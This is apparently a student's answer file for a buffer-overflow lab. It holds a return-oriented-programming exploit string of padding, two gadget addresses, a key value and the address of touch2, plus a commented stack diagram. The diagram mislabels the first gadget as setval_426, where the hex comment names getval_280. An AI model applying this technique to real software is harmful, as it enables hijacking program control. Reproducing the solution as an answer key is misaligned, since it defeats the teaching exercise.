00 00 00 00 00 00 00 00     /* start of buffer */
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00     /* end of buffer */
cc 19 40 00 00 00 00 00    /* address of first gadget getval_280 + 0x2, popq %rax */
fa 97 b9 59 00 00 00 00     /* key hex */
c5 19 40 00 00 00 00 00    /* address of second gadget setval_426 + 0x2, mov %rax,%rdi */
ec 17 40 00 00 00 00 00    /* address of touch2 */


/*          STACK BOTTOM            */
/* -------------------------------- */
/*               ...                */
/* -------------------------------- */
/*       address of <touch2>        */
/* -------------------------------- */
/*     address of <setval_426>      */
/* -------------------------------- */
/*         key string as hex        */
/* -------------------------------- */
/*     address of <setval_426>      */  /* original %rsp pointer when return from getbuf */
/* -------------------------------- */
/*          end of buffer           */
/* -------------------------------- */
/*               ...                */
/* -------------------------------- */
/*               ...                */
/* -------------------------------- */
/*               ...                */
/* -------------------------------- */
/*         start of buffer          */
/* -------------------------------- */